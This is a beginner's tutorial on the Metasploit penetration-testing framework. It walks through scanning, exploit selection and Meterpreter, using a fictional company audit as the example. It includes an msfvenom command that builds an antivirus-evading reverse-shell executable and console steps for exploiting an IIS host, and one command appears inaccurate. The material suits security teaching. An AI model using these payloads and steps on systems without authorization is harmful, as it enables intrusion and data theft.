Metasploit: A Powerful Exploitation Framework for Pen Testers

If you‘re an aspiring penetration tester or ethical hacker, one of the most important tools you need to master is Metasploit. It‘s an extremely powerful and flexible framework that will allow you to streamline your vulnerability scanning and exploitation as you‘re auditing networks and systems.

In this in-depth guide, I‘ll walk you through everything you need to know to start using Metasploit effectively in your pen testing workflows. We‘ll cover the core components of the framework, how to use important tools like the Metasploit console and Meterpreter, and step through some real examples of discovering and exploiting vulnerabilities.

By the end of the post, you‘ll have a solid foundation to start practicing with Metasploit safely to hone your skills. Let‘s dive in!

What is Metasploit?

At its core, Metasploit is a penetration testing framework written in Ruby that provides all the tools you need to find and exploit security holes throughout the entire lifecycle of a penetration test.

The beauty of Metasploit is that it‘s an open-source, extensible framework. This means that in addition to a huge library of built-in exploits and payloads, you can easily write your own custom modules in Ruby to extend functionality exactly how you need.

Metasploit was acquired by cybersecurity firm Rapid7 in 2009, which still maintains the open core framework while also providing commercial solutions like Metasploit Pro with more advanced features for enterprise security teams.

One of the major advantages of Metasploit is that it aggregates exploits and payloads for a huge number of known vulnerabilities in one place. The framework is constantly updated as new vulnerabilities are discovered and published in databases like the Common Vulnerabilities and Exposures (CVE) list.

So if a zero-day vulnerability is found in a popular piece of software or operating system, you can usually find a working exploit module for it in Metasploit quickly to check if your organization is affected.

Metasploit is also preinstalled in popular penetration testing Linux distributions like Kali Linux and Parrot OS, so it‘s always at your fingertips.

Key Components of Metasploit

To use Metasploit effectively, it‘s important to understand its key components and how they work together to find and exploit vulnerabilities. Let‘s break down the most important pieces.

Exploits

An exploit in Metasploit is a piece of code that takes advantage of a security flaw or vulnerability to gain access to a target system or network without authorization.

Exploits can target all types of vulnerabilities, including ones found in networks, web applications, operating systems, browsers, and even IoT devices. Common exploit techniques include buffer overflow, SQL injection, and remote code execution attacks.

Metasploit has a huge library of different exploits that are constantly updated, so you can quickly find ones relevant to the systems you‘re testing.

There are two main types of exploits:

1. Active exploits – These will run on the target system, exploit the vulnerability, and exit.

2. Passive exploits – These exploits just listen for incoming connections, waiting for a user to connect. This is how many malicious hackers distribute malware, waiting for the user to download and run a Trojan horse program.

Payloads

While an exploit takes advantage of a vulnerability, a payload is the actual code that will run on the target system. Exploits and payloads go hand-in-hand – the exploit gets the payload into the vulnerable system.

Metasploit has a wide variety of payloads for different goals and situations, including:

• Command shells to remotely control the target system
• Meterpreter agents for advanced post-exploitation
• Installing malware like keyloggers or RATs (remote access trojans)
• Privilege escalation tools
• Pivoting tools to route traffic through the compromised machine

There are three main categories of payloads in the framework:

1. Singles – Payloads like shell_reverse_tcp that work on their own to create a connection

2. Stagers – Payloads that work in pairs, where one piece sets up a connection channel and the other sends the actual attack instructions to execute.

3. Stages – The second part of a payload that gets downloaded by the stager, such as a larger binary file.

While not every payload will work with every exploit, you can use the show payloads command after selecting an exploit in the Metasploit console to see compatible payloads.

Auxiliaries

Auxiliary modules are an important piece of the framework that let you run other useful tasks besides just finding and exploiting vulnerabilities.

For example, scanning for open ports, fingerprinting systems, brute-forcing passwords, performing man-in-the-middle attacks, or fuzzing applications with unexpected input to see how they respond.

The beauty of auxiliaries is that you can write your own custom modules in Ruby tailored to your needs. For example, you could write a scanner that checks a network for unpatched systems vulnerable to a specific CVE on a schedule.

This allows you to extend Metasploit however you need, and is a great option if you don‘t want to use a separate tool for a certain task like network scanning.

Important Metasploit Tools

Now that you understand the key pieces of the Metasploit framework conceptually, let‘s highlight some of the most important tools you need to know to actually use it.

msfconsole

The msfconsole is the main command-line interface you‘ll use to interact with the framework. While it has a learning curve, once you master it you‘ll be able to quickly find exploits, configure payloads, run scans, and exploit targets.

Some of the most useful msfconsole commands include:

• search – Find exploits or payloads that match a keyword
• use – Load a specific Metasploit module
• show options – See the variables you need to configure for the selected module
• set – Define the value for a specific variable
• exploit – Run the exploit with all variables defined

Msfconsole also supports tab completion, which is a big time-saver when entering commands. Once you‘re comfortable with the console, you can also write your own scripts using its built-in Ruby interpreter to automate common tasks.

msfvenom

Msfvenom is a separate command-line tool that‘s incredibly useful for generating custom shellcode payloads on the fly. It was created by combining the older msfpayload and msfencode tools.

Why would you need a custom payload? In many situations, the target system may have antivirus or other protections that can detect and block default Metasploit payloads.

By using msfvenom, you can encode a payload to evade those protections. Msfvenom supports a wide variety of shellcode formats (C, Python, Ruby, dll, aspx, and much more).

To generate encoded payloads with msfvenom, you need to supply:

• The payload you want to generate
• Any options to customize the shellcode
• The output format
• An encoder to use
• The output file name

For example, here‘s a simple msfvenom command that generates an encoded Windows shell payload:

msfvenom -p windows/shell_reverse_tcp LHOST=10.1.1.1 LPORT=4444 -f exe -o shell_reverse.exe -e shikata_ga_nai -i 9

This will generate an executable file that contains code to open a reverse shell to the attacker‘s machine, encoded with the shikata_ga_nai encoder 9 times to evade antivirus detection.

Meterpreter

Meterpreter is Metasploit‘s most powerful payload. It‘s an advanced, dynamically extensible payload that allows you to gather detailed information and execute commands on the target machine.

Some of the key features of Meterpreter include:

• Works on Windows, Linux, and macOS
• Runs entirely in memory to avoid being detected
• Communicates over encrypted channels
• Modular design allows you to load/unload components as needed
• Detailed, built-in commands for post-exploitation
• Full Ruby interpreter for writing your own extensions

With a Meterpreter shell on the target system, you can dump password hashes, access the file system, record keystrokes, take webcam snapshots, pivot to other machines, and much more, all while being extremely difficult to detect.

Putting It All Together: Hacking with Metasploit

Now that you understand the key pieces of Metasploit, let‘s walk through a basic penetration test so you can see how it all fits together.

Imagine you‘re a new pentester at Acme Inc and you‘ve been tasked with auditing the company‘s network for security holes. You fire up Kali Linux and decide to use Metasploit to streamline your workflow.

Scanning

The first step is to perform reconnaissance to map out the network and find potential targets. You could use a port scanner directly in msfconsole with the db_nmap command.

For example, the command db_nmap -sV 192.168.1.0/24 would scan the entire 192.168.1.1-254 range and fingerprint any machines it finds. The -sV option probes the open ports to try to detect service/version info.

The db_ prefix ensures the results are saved to Metasploit‘s database so you can easily refer back to them.

Another option for the scanning step would be to use a vulnerability scanner like Nessus and then import the results into Metasploit with:

msfdb import /path/to/scan.nessus

Finding Exploits

After you have a list of target machines and services fingerprinted, it‘s time to find relevant exploits.

Let‘s say your scan turned up a Windows 2000 machine running a web server on port 80. To find exploits that may work on this server, in the msfconsole you could search:

msf> search type:exploit platform:windows target:2000 port:80

This would give you a list of all Windows exploits for port 80 that are known to work against Windows 2000.

If you spot an enticing exploit, like say a buffer overflow flaw in IIS, you could select it with use:

msf> use exploit/windows/iis/iis_webdav_scstorage

Configuring Options

Before you can run the exploit, you need to configure it with the appropriate options.

Running show options will give you a list of all the variables you need to set. Metasploit exploits have required variables like RHOST (target host IP) and RPORT (target port), and sometimes optional ones like SSL.

Set the variables to your intended target, for example:

msf> set RHOSTS 192.168.1.105
msf> set RPORT 80

Selecting a Payload

Next you need to decide what payload you want to pair with your exploit. Run show payloads to see a list of compatible payloads for that specific exploit.

Let‘s say you spot windows/meterpreter/reverse_tcp in the list and decide to use that to try to gain a Meterpreter shell:

msf> set payload windows/meterpreter/reverse_tcp

Running show options again will reveal payload-specific options you need to set like LHOST (listening host IP for reverse connection) and LPORT (the port to connect back on).

Exploiting

Once you‘ve configured everything, simply type exploit to run the module.

If the exploit is successful and Metasploit receives a TCP connection back from the payload on the target machine, you‘ll see a Meterpreter shell open that allows you to interact with the target.

Meterpreter has a variety of commands like ls and download for interacting with the target machine. You can see all of the options available by running the help command.

From there, you could continue privilege escalation and pivoting deeper into the network until you‘ve achieved your objectives (e.g. capturing the domain admin account).

Armitage – a Graphical Interface

While msfconsole is extremely powerful, the command line isn‘t for everyone. If you prefer a graphical user interface for Metasploit, you can use the Armitage tool.

Armitage provides a graphical frontend to Metasploit that visualizes targets and recommends exploits. It integrates seamlessly with Metasploit and the database backend.

With Armitage, you can launch scans, send phishing emails, share sessions with teammates, and run exploits all from an intuitive interface. However, you‘ll still need to use msfconsole for the full features and flexibility of the framework.

Staying Within the Law

While hacking systems without permission may sound thrilling, as an ethical hacker or penetration tester, it‘s critical that you ensure you stay within legal bounds at all times. A few tips:

• Always get explicit, written permission from the owner of any system before attempting to scan or exploit it
• Make sure you understand your client‘s expectations and rules of engagement before beginning a pentest
• Never test production systems unless you have explicit approval
• Carefully document the scope of your penetration testing activities in case any issues arise
• Keep detailed notes of your findings to provide in a pentesting report to your client

Metasploit is an extremely powerful piece of software, but like any tool, it can be abused. Make sure to only use it for good!

Go Forth and Pwn

In this guide, we‘ve covered all the key concepts and tools you need to know to start using Metasploit effectively in your own penetration tests and security research. While it may seem overwhelming at first, with practice you‘ll master this essential tool.

If you want to learn more and really dive deep into Metasploit, I highly recommend checking out the free online course at https://metasploit.help.rapid7.com/. It provides hours of detailed video tutorials.

As you‘re learning, be sure to practice on systems you have permission to test, and don‘t be afraid to experiment writing your own exploits and modules. Before long, you‘ll be finding vulnerabilities like a pro with this Swiss army knife of hacking.

The power of Metasploit is now in your hands. Go forth and pwn!